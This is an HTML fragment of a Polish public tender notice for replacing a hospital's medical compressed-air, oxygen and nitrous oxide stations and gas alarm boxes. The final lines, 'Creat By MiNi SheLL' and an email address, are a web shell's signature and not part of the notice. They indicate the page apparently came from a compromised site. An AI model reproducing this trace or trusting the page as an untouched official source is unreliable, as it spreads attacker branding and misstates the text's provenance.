              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 16/11/2016, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Stacja sprężarek powietrza do celów medycznych<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Modernizacja stacji sprężonego powietrza do celów medycznych.
Układ połączeń w stacji sprężarek oraz zastosowane urządzenia powinny być zgodne 
z wymaganiami PN-EN ISO 7396-1. W zakresie przedmiotu zamówienia znajdują się dostawa, montaż i uruchomienie następujących urządzeń: 
	2 x sprężarka śrubowa smarowana olejem o wydajności min. 100 m3/h, ciśnienie tłoczenia 11 bar(g),
	podwójna jednostka oczyszczająca, wytwarzająca sprężone powietrze w klasie 1,1,1 wg. ISO 8573-1. Urządzenie składające się z kolumn usuwających z powietrza H2O oraz CO2, NOx, zapach 
i CO, z wbudowanym na wlocie: separatorem cyklonowym, filtrem wstępnym i dokładnym. Kolumny urządzenia zapewniające  zawartość resztkową par oleju poniżej 0,003 mg/m3 w temp. 21 C i utlenianie CO do CO2. Jednostka wyposażona w mikroprocesorowy sterownik nadrzędny kontrolujący pracę wszystkich urządzeń stacji sprężarek powietrza,
	podwójny węzeł filtracyjny (pyłowy) usuwający zanieczyszczenia stałe powyżej 0,01 m,
	 2 zbiorniki ocynkowane o poj. min. 0,9 m3 każdy z kompletnym osprzętem: manometr, zawór bezpieczeństwa,
	separator wody i oleju z kondensatu,
	kompletny węzeł redukcyjny sprężonego powietrza składający się z 2 reduktorów w układzie by-pass, każdy o wydajności min. 200 m3/h przy 5 bar, każdy zabezpieczony zaworem bezpieczeństwa początek otwarcia przy ciśnieniu 6 bar i analogowym przetwornikiem ciśnienia za reduktorami,
	rampa zasilania awaryjnego dla 8 szt. butli z tablicą redukcyjną o wyd. min. 70 m3/h przy ciśnieniu 5 bar,
	moduł telemetryczny do generowania wiadomości tekstowych SMS w sytuacji alarmowej.

         Sterownik nadrzędny wyposażony w kolorowy ciekłokrystaliczny dotykowy panel kontrolny 
z wizualizacją pracy podłączonych urządzeń. Pełni nadrzędną rolę nad indywidualnymi układami sterowniczymi poszczególnych maszyn oraz jednostki oczyszczającej sprężone powietrze. Na sterowniku wymagana jest graficzna wizualizacja pracy urządzeń stacji sprężarek: ciśnienie w układzie za sprężarkami, ciśnienie wyjściowe (zredukowane), temp. punktu rosy, temp. w pomieszczeniu, ciśnienie w awaryjnej rampie butli wraz z zapisem parametrów pracy (temp. pkt rosy, poszczególne wartości ciśnienia, wykresy pracy sprężarek). Sterownik nadrzędny musi być wyposażony we włącznik mechaniczny, który wymusza załączanie i wyłączanie sprężarek w sytuacji uszkodzenia mikroprocesorowego sterownika nadrzędnego. Sterownik może pracować w dwóch trybach sekwencyjnym lub kaskadowym, jest wyposażony w złącze RS485. 

       Wyceną należy objąć demontaż istniejących urządzeń, dostawę wraz montażem pneumatycznym i elektrycznym fabrycznie nowych urządzeń oraz wszelkie materiały dodatkowe konieczne do podłączenia pneumatycznego w obrębie modernizowanego źródła zasilania, tj. rury i złączki miedziane, lut srebrny LS45, mocowania rurociągów, zawory kulowe itp. W wycenie należy ująć okablowanie sterownicze urządzeń i zasilanie energią elektryczną.
       Zamawiający wymaga monitorowania i sygnalizowania stanów alarmowych:
	awaria każdej sprężarki powietrza za pomocą osobnego sygnału alarmowego,
	 ciśnienia wyjściowego ze stacji sprężarek,
	awaria każdego osuszacza absorpcyjnego,
	przekroczenie zadanego progu temp. punktu rosy,
	pomiar temperatury w pomieszczeniu stacji sprężarek.



Moduł telemetryczny
     Zamawiający wymaga montażu modułu telemetrycznego celem powiadamiania o stanach alarmowych za pomocą wiadomości tekstowych SMS przesyłanych w sieci komórkowej GSM. Wiadomości powinny być wysyłane na skutek zmiany stanu linii wejściowej (meldunek) lub okresowo (raport), bądź też na żądanie użytkownika (raport na żądanie). W wiadomościach SMS, przypisanych indywidualnie dla każdej linii, mogą być przesyłane zaprogramowane wcześniej teksty, wyniki pomiarów z linii wejściowych, bądź też status modułu. Moduł telemetryczny powinien udostępniać następujące funkcje:
	wysyłanie SMS po wykryciu zmiany stanu linii wejściowej,
	pomiar temperatury z dwóch czujników z powiadamianiem,
	możliwość dołączenia akumulatora podtrzymującego zasilanie,
	programowanych wiadomości SMS, 
	powiadomienia wysyłane na 3 numery telefonów.
     Dostarczenie karty SIM dowolnego operatora GSM znajduje się w zakresie Zamawiającego 
 wymagane dostarczenie modułu bez simlock. 

Zamawiający wymaga przeszkolenia personelu i obsługi technicznej w zakresie obsługi i użytkowania urządzeń.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>42123400-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 6<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji</td><td>20</td></tr><tr><td>Termin realizacji</td><td>15</td></tr><tr><td>Okres płatności</td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Rezerwowa stacja redukcji tlenu<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Modernizacja rampy tlenu i podtlenku azotu.
Rezerwowa stacja redukcji tlenu wraz z węzłem redukcyjnym ze stacji zgazowania tlenu.
         Układ połączeń w rezerwowej stacji redukcji tlenu oraz zastosowane urządzenia powinny być zgodne z wymaganiami PN-EN ISO 7396-1. W zakresie przedmiotu zamówienia znajdują się dostawa, montaż i uruchomienie następujących urządzeń: 
	dwustopniowa automatyczna tablica redukcyjna tlenu zasilana dwustronnie, wyposażona 
w przełącznik automatyczny, cyfrowy panel kontrolny. Wydajność przepływu min. 170 m3/h przy ciśn. 5 bar, ciśnienie wlotowe tablicy 300 bar, ciśnienie wyjściowe regulowane w zakresie 1-9 bar, zasilanie 230 VAC,
	cyfrowy panel kontrolny tablicy, który monitoruje i wyświetla parametry pracy urządzenia: bieżącą wartość ciśnienia w rampach butlowych, wartość ciśnienia wyjściowego, stan zaworów odcinających (otwarty / zamknięty),
	2 x rampa z 12 stanowiskami butlowymi każde z zaworem zwrotnym i przyłączem elastycznym butli. Każda z ramp wyposażona w zawór wydmuchowy i manometr ciśnienia, zawór odcinający rampę od tablicy z filtrem wysokociśnieniowym,
	2 x zawór z czujnikiem pozycji otwarty/zamknięty i sygnalizacją stanu w tablicy redukcyjnej,
	2 x zawór zwrotny,
	podwójny węzeł redukcyjny tlenu ze stacji zgazowania wyposażony w zawory bezpieczeństwa. Max ciśnienie wlotowe 25 bar, ciśnienie wyjściowe regulowane w zakresie 1-9 bar,
	moduł telemetryczny sygnalizacji alarmowej źródła zasilania wspólny ze st. redukcji N2O. 

      Wyceną należy objąć demontaż istniejących urządzeń, dostawę wraz montażem pneumatycznym 
i elektrycznym fabrycznie nowych urządzeń oraz wszelkie materiały dodatkowe niezbędne do podłączenia w obrębie modernizowanego źródła zasilania, tj. rury i złączki miedziane, lut srebrny LS45, mocowania rurociągów, zawory kulowe, przewody elektryczne itp. W wycenie należy ująć zasilanie energią elektryczną.
 
Zamawiający wymaga monitorowania i sygnalizowania stanów alarmowych:
	niskie ciśnienie w każdej rampie butli za pomocą osobnego sygnału alarmowego,
	ciśnienie ze zbiornika,
	wysokie lub niskie ciśnienie wyjściowe ze stacji,
	 zamknięcie zaworu głównego ze stacji zgazowania tlenu.

Stacja redukcji podtlenku azotu 

         Układ połączeń oraz materiały dodatkowe są zgodne z wymaganiami PN-EN ISO 7396-1. 
W zakresie przedmiotu zamówienia znajdują się dostawa, montaż i uruchomienie następujących urządzeń: 
	dwustopniowa automatyczna tablica redukcyjna N2O zasilana dwustronnie, wyposażona 
w przełącznik automatyczny, cyfrowy panel kontrolny, wydajność przepływu min. 40 m3/h przy ciśn. 5 bar, ciśnienie wlotowe 100 bar, ciśnienie wyjściowe regulowane w zakresie 1-9 bar, zasilanie 230 VAC,
	cyfrowy panel kontrolny tablicy, który monitoruje i wyświetla parametry pracy urządzenia: bieżącą wartość poszczególnych ciśnień,
	2 x rampa z 6 stanowiskami butlowymi każde z zaworem zwrotnym i przyłączem elastycznym butli. Każda z ramp wyposażona w zawór wydmuchowy i manometr ciśnienia, zawór odcinający rampę od tablicy wyposażony w filtr wysokociśnieniowy,
	dwustopniowa tablica redukcyjna zasilania awaryjnego,
	rampa awaryjna z 2 stanowiskami butlowymi każde z zaworem zwrotnym i przyłączem elastycznym butli. Wyposażona w zawór wydmuchowy i manometr ciśnienia, zawór odcinający rampę od tablicy z filtrem wysokociśnieniowym,
	moduł telemetryczny sygnalizacji alarmowej źródła zasilania wspólny ze st. redukcji O2. 

Wyceną należy objąć demontaż istniejących urządzeń, dostawę wraz montażem pneumatycznym 
i elektrycznym fabrycznie nowych urządzeń oraz wszelkie materiały dodatkowe niezbędne do podłączenia w obrębie modernizowanego źródła zasilania, tj. rury i złączki miedziane, lut srebrny LS45, mocowania rurociągów, zawory kulowe, przewody elektryczne itp. W wycenie należy ująć zasilanie energią elektryczną.
 
     Zamawiający wymaga monitorowania i sygnalizowania stanów alarmowych: 
	niskie ciśnienie w każdej rampie butli za pomocą osobnego sygnału alarmowego,
	wysokie lub niskie ciśnienie wyjściowe ze stacji,
	zamknięcie zaworu głównego ze stacji zgazowania tlenu.

Moduł telemetryczny

     Zamawiający wymaga montażu modułu telemetrycznego celem powiadamiania o stanach alarmowych za pomocą wiadomości tekstowych SMS przesyłanych w sieci komórkowej GSM. Wiadomości powinny być wysyłane na skutek zmiany stanu linii wejściowej (meldunek) lub okresowo (raport), bądź też na żądanie użytkownika (raport na żądanie). W wiadomościach SMS, przypisanych indywidualnie dla każdej linii, mogą być przesyłane zaprogramowane wcześniej teksty, wyniki pomiarów z linii wejściowych, bądź też status modułu. Moduł telemetryczny powinien udostępniać następujące funkcje:
	wysyłanie SMS po wykryciu zmiany stanu linii wejściowej,
	pomiar temperatury z dwóch czujników z powiadamianiem,
	możliwość dołączenia akumulatora podtrzymującego zasilanie,
	programowanych wiadomości SMS, 
	powiadomienia wysyłane na 3 numery telefonów.
     Dostarczenie karty SIM dowolnego operatora GSM znajduje się w zakresie Zamawiającego 
 wymagane dostarczenie modułu bez simlock. 

Zamawiający wymaga przeszkolenia personelu i obsługi technicznej w zakresie obsługi i użytkowania urządzeń.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33157000-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 6<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji</td><td>20</td></tr><tr><td>Termin realizacji</td><td>15</td></tr><tr><td>Okres płatności</td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Strefowe zespoły kontrolno-alarmowe (skrzynki) i sygnalizatory stanu gazów medycznych<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Wymiana strefowych zespołów kontrolno-alarmowych i sygnalizatorów stanu gazów medycznych na Bloku Operacyjnym i Oddziale Anestezjologii i Intensywnej Terapii.
W ramach przedmiotowego zadania, Zamawiający wymaga montażu strefowych zespołów kontrolno-alarmowych (10 szt.) i współpracujących z nimi sygnalizatorów stanu gazów medycznych (16 szt.).   
Zespół kontrolno-alarmowy musi spełniać wymogi obowiązujących norm w tym PN-EN ISO 7396-1 oraz Dyrektywy Medycznej MDD 93/42 EEC oraz posiadać oznaczenie znakiem zgodności CE potwierdzone przez Jednostkę Notyfikowaną i muszą być zarejestrowane jako wyrób medyczny klasy IIb oraz umożliwiać:
	zamykanie i otwieranie przepływu gazów będących pod ciśnieniem,
	pomiar ze wskazaniem bieżącym ciśnienia i podciśnienia gazów z wykorzystaniem wyświetlacza LCD i panela dotykowego,
	generowanie sygnałów dla potrzeb sygnalizacji awaryjnej,
	sygnalizowanie w sposób optyczny i akustyczny stanów alarmowych (przekroczenie ciśnienia max. i min),
	uzyskanie tolerancji pomiaru ciśnienia przez czujnik, nie przekraczającej  3%,
	podłączenie zasilania awaryjnego dla obsługiwanego obszaru w przypadku awarii centralnego zasilania w gazy medyczne,
	współpracę z zewnętrznymi sygnalizatorami stanu gazów medycznych wyposażonymi 
w wyświetlacz LCD i panel dotykowy.

W zależności od lokalizacji, Zamawiający wymaga montażu w/w skrzynek z podejściem dopływowym zarówno od góry jak i od dołu. Średnice rur przyłączeniowych dostosowane do istniejących rurociągów. Urządzenia współpracujące z zewnętrznymi sygnalizatorami gazów, które sygnalizują spadek lub wzrost ciśnienia gazów medycznych w instalacjach wewnętrznych. Przy pomocy umieszczonych w punktach stałego nadzoru medycznego sygnalizatorów optyczno-akustycznych alarmowany jest personel medyczny o spadku lub wzroście ciśnienia gazu medycznego. Umożliwia to podjęcie w porę odpowiednich działań zapobiegających skutkom nieprawidłowego dopływu gazów do pacjentów.

Wymiana strefowych zespołów kontrolno-alarmowych i współpracujących z nimi sygnalizatorów stanu gazów medycznych polegająca na: 
	demontażu istniejących urządzeń (strefowych zespołów kontrolno-alarmowych i sygnalizatorów gazów medycznych),
	montażu instalacyjnym i pneumatycznym 10 strefowych zespołów kontrolno-alarmowych dla 4 gazów: tlen, podtlenek azotu, sprężone powietrze, próżnia,
	montażu instalacyjnym 16 sygnalizatorów alarmowych stanu gazów medycznych dla 4 gazów: tlen, podtlenek azotu, sprężone powietrze, próżnia,
	podłączenie sygnalizacji alarmowej stanu gazów medycznych z wykorzystaniem istniejących przewodów lub własnych do zewnętrznego sygnalizatora wyposażonego w wyświetlacz LCD 
i panel dotykowy,
	wyrównanie ścian poprzez wykonanie w zależności od lokalizacji: gładzi ściennych lub warstwy wyrównującej pod tapetę ścienną,
	malowanie powierzchni ścian farbą,
	uruchomienie instalacji sygnalizacji alarmowej,
	szkolenie personelu i obsługi technicznej.

        Bezpośrednio po wykonanym montażu pneumatycznym należy sprawdzić szczelność wykonanych połączeń. Po zakończonym montażu wymagane jest przeprowadzenie testów zgodnie 
z wymaganiami PN-EN ISO 7396-1 w zakresie właściwym dla zrealizowanych robót. Połączenia nierozłączne należy wykonać za pomocą lutu srebrnego zgodnie z wymaganiami PN EN 13485. 

Wymagania dla Wykonawcy 
          Zamawiający wymaga aby Wykonawca przedstawił w ofercie następujące dokumenty: 
a) certyfikat systemu zarządzania jakością dla wyrobów medycznych zgodnie z normą EN ISO 13485:2012+AC:2012 w zakresie "Projektowanie i rozwój, wytwarzanie, instalowanie, dystrybucja i serwisowanie instalacji rurociągowych gazów medycznych i próżni",
b) certyfikat CE na Dyrektywę 93/42/EEC,
c) dokumenty potwierdzające dysponowanie co najmniej 2 osobami, które posiadają ważne uprawnienia Świadectwa Kwalifikacyjne zgodnie z PN-EN ISO 13585:2012 "Lutowanie twarde - Kwalifikowanie lutowaczy i operatorów lutowania twardego" które będą uczestniczyły w realizacji zamówienia,
d) dokumenty potwierdzające parametry techniczno-funkcjonalne producenta/ów oferowanych urządzeń potwierdzających w sposób jednoznaczny i nie budzący wątpliwości spełnienie podanych wymagań:
- karty katalogowe,
- aprobata/y CE dla wyrobu z podaniem jego typu oraz modelu i wytwórcy,
- deklaracje zgodności.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33157000-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 6<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres gwarancji</td><td>20</td></tr><tr><td>Termin realizacji</td><td>15</td></tr><tr><td>Okres płatności</td><td>5</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com